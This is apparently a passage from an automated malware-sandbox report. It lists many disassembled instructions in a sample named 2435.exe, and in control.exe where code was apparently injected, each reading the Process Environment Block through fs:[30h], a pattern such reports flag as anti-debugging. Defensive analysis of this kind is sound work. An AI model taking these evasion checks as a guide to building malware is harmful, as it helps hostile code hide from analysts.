          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A93A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A75210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AB927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B2B260 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B48A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B3EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B04257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B45BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A81B8F mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B2D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B3138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AAB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A9DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B223E3 mov ecx, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B223E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AF53CA mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A9A309 mov eax, dword ptr fs:[00000030h] (21 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B3131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A7DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA3B7A mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A7DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B48B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A7F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B34496 mov eax, dword ptr fs:[00000030h] (13 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A8849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B48CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h] (14 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A9746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AAAC7B mov eax, dword ptr fs:[00000030h] (11 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B0C450 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AAA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00B405AC mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exe Code function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B28DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B48D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AFA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B23D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A97D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B48ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B2FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B2FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AA8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B31608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A88794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AB37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A9F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00B48F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2435.exeCode function: 1_2_00A8EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04808CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0480740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0480740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0480740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04757D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_048005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04773D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047E3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04743D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0473AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04764D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04808D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04761DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_047635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0476FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04762581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04732D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0475AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_0474766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04800EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 9_2_04800EA5 mov eax, dword ptr fs:[00000030h]
